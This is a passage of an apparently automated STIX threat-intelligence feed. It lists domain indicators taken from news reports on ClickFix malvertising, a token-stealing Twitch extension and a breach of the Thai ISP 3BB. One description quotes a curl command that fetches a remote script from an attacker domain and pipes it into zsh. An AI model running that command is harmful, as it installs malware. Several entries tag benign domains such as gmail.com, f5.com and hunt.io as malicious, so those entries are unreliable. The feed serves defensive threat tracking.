sk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributio","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99dfa62c-e839-4859-a3a6-deb87fd5e442","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: trick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS di","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--07b6a4e1-3b9a-435f-bcd6-d9c8bf6dfe6d","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an Ope","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--864e022f-d7ad-46e0-b365-b2878bc47afb","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: s, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospect","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--30edb40b-bbb4-4f38-a6d0-74e0c21c604b","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: n be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking th","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--59057938-cc08-4a1d-8a21-04bafe836233","created":"2026-09-14T19:03:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ttvnw.net","description":"Seen in \"Twitch extension with 30K installs exposes users’ OAuth tokens\" (BleepingComputer). Context: tension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= q","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T19:03:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/twitch-extension-with-30k-installs-exposes-users-oauth-tokens/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8aff88e5-0aa6-47ce-a977-768f9b37fec0","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbo","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5773aa37-09c3-4be2-bdaa-9b1375b1aead","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: code-desktop.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: , 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the a","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e73923aa-8a12-433e-a347-e304f10fcf06","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: codex-craft.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing t","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6894ad71-4625-4831-b8c5-5a92e7bd1053","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ember-bridge.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: lowing command: export _watch_v2=97d9d8dc;curl -sL \"https://ember-bridge[.]com/curl/a44a37519au/setup.sh\"| zsh Hudson Rock noted ember-b","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--31eaba0e-3380-4f84-86da-0ac28f875803","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: .]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience t","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b6561a87-1ae8-4190-8bef-12256aaf20d3","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.app","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: ddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c1888839-df7e-4666-951a-65f1eb234ca8","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.us","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: Max subreddits,\" warned the user . \"The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button /","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2db52395-a8a3-4e1d-94e2-24621d6691c6","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: agent.3bb.co","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: eshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w","pattern":"[domain-name:value = 'agent.3bb.co']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cd5db35c-0cb6-4c0f-9e44-3fb869f3fbf0","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ayuthayatech.com","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: reporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f611664b-db59-4fbb-8ba5-4a60bd78c6b2","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: co.th","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: s over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords,","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--00cb1f30-8141-4dd0-9556-9afc9c4fbe81","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hunt.io","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: tacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c67fcdb4-0520-4f7d-b54e-0d0abd60b906","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: s to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple enro","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9772997-97e0-46b2-965f-bc907e425e6f","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: a FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPN","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c596e94-c773-499b-b63f-2a26ae211237","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: configuration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly,","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--503463d0-651d-4d91-9d8d-fe7060891dab","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: , including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A capture","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--db0e8884-f262-49ac-a5b7-79b8009ae127","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: f5.com","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: allowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructure","pattern":"[domain-name:value = 'f5.com']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--36facd53-b4df-4d80-8302-55f9e804c8c2","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: server.host","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: se it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingress","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--649e2f7f-e4bc-4841-80de-7d89f6800753","created":"2026-09-14T16:15:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: server.host","description":"Seen in \"Hackers target exposed Vite dev servers to steal AWS, Azure secrets\" (BleepingComputer). Context: pose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology comp","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:15:58.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-exposed-vite-dev-servers-to-steal-aws-azure-secrets/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d61bacb-62c1-43a8-ba69-f35c95c0f4cd","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: alexue4.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: m Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15","pattern":"[domain-name:value = 'alexue4.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf906c49-6bb3-4427-9147-e159b175255d","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: api.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc","pattern":"[domain-name:value = 'api.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ea14afdf-9f3a-4951-9849-81a8942883c0","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; host","pattern":"[domain-name:value = 'drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1fe1e5b8-6061-439f-9926-dcd38cf00c57","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: enhanced-1.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154;","pattern":"[domain-name:value = 'enhanced-1.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b458440-51d2-4b1a-a08b-502a7df021d8","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: enhanced.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1","pattern":"[domain-name:value = 'enhanced.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--958d54a3-ff03-4d77-bddf-0ddd3ed77bf8","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ext-03.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain a","pattern":"[domain-name:value = 'ext-03.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3fab6844-3924-4ff3-9044-bbf2b577c2f4","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ext-styles.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: P address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]","pattern":"[domain-name:value = 'ext-styles.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1d04e6b4-bd49-4a48-a85f-4cc8c959a6a3","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gmail.com","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifier","pattern":"[domain-name:value = 'gmail.com']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--30a2f52c-acd4-4896-a390-649847c4f1b5","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: img.drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: elper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation Hi","pattern":"[domain-name:value = 'img.drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--70be440e-3665-472a-83b2-7feeb13bc7ac","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[.","pattern":"[domain-name:value = 'jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0f3a8c7-d0f8-4f07-a3ab-61e6d0e16299","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO","pattern":"[domain-name:value = 'morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1a88d023-7951-4020-b527-845272532afe","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: proxy.morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: jeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-s","pattern":"[domain-name:value = 'proxy.morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c115cea8-4df1-4137-8134-08112d6e41fb","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: proxy.thebeholder.deno.net","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: up token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endp","pattern":"[domain-name:value = 'proxy.thebeholder.deno.net']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 